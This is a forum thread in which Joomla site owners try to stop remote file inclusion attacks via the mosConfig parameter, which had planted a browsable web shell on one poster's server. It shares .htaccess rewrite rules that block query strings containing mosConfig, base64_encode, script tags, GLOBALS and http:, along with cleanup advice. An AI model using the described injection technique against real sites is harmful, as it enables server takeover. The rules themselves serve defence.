mosConfig.absolute.path attack - can't stop with htaccess!!!

[mexicoshaun]

ok i dont usually post but this is driving me mad!

joomla 1.0.15 + virtuemart + sef

i have the htaccess supposedly blocking injection through the mosConfig.absolute.path expolit but it doesnt work - ie if i put the url in it still loads the remote hack file

the url example being used to attack me is
http://www.mysite.co.uk/index.php?optio ... content/x??

the webpage that appears is a shell which enables you to browse the server, upload files, etc - so not good as its a shared server

the line i have in htaccess which should work is the standard :

# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]



At the moment I am resorting to trying to block other aspects of the url [not working well] and denying ip addresses [yes i know...]

Any insight would be much appreciated. I tend to blame virtuemart as i have other 1.1.15 sites without these issues

tia 2 any and all

-------------------HTACCESS-FOLLOWS-----------------------

## Can be commented out if causes errors, see notes above.
Options FollowSymLinks

# mod_rewrite in use
RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits

# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]

########## End - Rewrite rules to block out some common exploits

# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla/MamboDirectory (just / for root)

RewriteBase /

# Trying to block attacker
order allow,deny
deny from 110.138.192.72
deny from 66.216.127.211
allow from all


########## Begin 3rd Party or Core SEF Section

#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$ [NC]
RewriteCond %{REQUEST_URI} !^/.+astringintheurl.+/?$ [NC]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule (.*) index.php

########## End 3rd Party or Core SEF Section


php_flag magic_quotes_gpc on
php_flag register_globals off

---------------------------------------------------------------------

[fcoulter]

You might try modifying the line

Code: Select all

RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

I had similar problems to you, the problem with that line is that it is too specific, it does not cover some types of attack that use mosConfig

I changed it to

Code: Select all

RewriteCond %{QUERY_STRING} .*mosConfig.*[OR]
RewriteCond %{QUERY_STRING} .*mosconfig.*[OR]

It should work for you, it did for me.

[mandville]

i have locked your other topic. apart from suggesting the migration to 1.5.15, the advice by fcoulter is quite valid

[mexicoshaun]

thanks

thanks to fcoulter for the solution to many days headaches - that worked - it does indeed seem that that line was too specific

for anyone else wanting to implement this make sure you add a space between * and [OR] as the syntax made it not work at first for me, so if u want to copy and paste this is spot on -

RewriteCond %{QUERY_STRING} .*mosConfig.* [OR]

[fcoulter]

Sorry yes the space is important!

In fact I also used

Code: Select all

RewriteCond %{QUERY_STRING} .*http:.* [OR]

that effectively blocked out all attempts at remote file inclusion through mosConfig or other means. But you need to think before using this, because there might be legitimate reasons for including an URL in the query string on your site, in which case this will cause problems.

I was getting a lot of attempts at remote file inclusion aimed at software I didn't even have installed on my site!! It was getting rather annoying, so this put a stop to it.

[jaimeschu]

I've been having the same issue. Fcoulter - I've applied your fix and I'm hoping it works. It seems that every week though a new directory is added to my root containing all of the spam links. Do you know the names of any php files to look out for? For instance, the first time this problem occured there was an add.php file that I found that contained malicious script.

Any other advice other than the modifications to .htaccess would be appreciated.

[fcoulter]

If a new directory is being added to your site then clearly the site security has been compromised. I suggest that you change your ftp passwords for a start.

Also look at this link. http://docs.joomla.org/Security_Checkli ... ng_Started

Good luck with this.

[mandville]

you can also use the cron file checker on checklist 7 to notify you of any files.
also running the forum post tool may highlight some holes/errors to us

[jaimeschu]

Yes, ftp password has been changed. Like I said this has been happening for a few months now. The odd thing is that the attacks that I appear to be getting are common attacks in earlier versions of Joomla, but I am up to date with all that.

Been through the checklist, not the cron file check though. Will do that today.

Other update: Since the change in .htaccess file, there are no recorded attacks based on what I see on sh404SEF. Not too sure what to think on this fact because I know we have been getting many attacks and by seeing in in the sh404SEF dashboard I know that the attacks have been blocked. Still, I don't see any new directories this morning and there are no weird links hidden in my index.php.

[fcoulter]

If you have blocked attacks through your .htaccess file then you will no longer see them in sh404sef, because they are stopped before your Joomla site is loaded, so sh404sef never gets to see them.

You would need to check your site (server) logs to see them.

I have been getting a lot of attacks aimed at earlier versions of Joomla, and indeed other systems that don't even exist on my site, all the more annoying because so utterly pointless.

I also think that there are more exploits aimed at getting hold of ftp passwords these days - that is probably how they got into your site. The problem is that ftp is not very secure.

[jaimeschu]

I found something I think anyone with this problem should look for:
http://forums.theplanet.com/index.php?showtopic=90109

The script was hidden in a file named data.php. A hacker can call it whatever he wants though. Disturbing.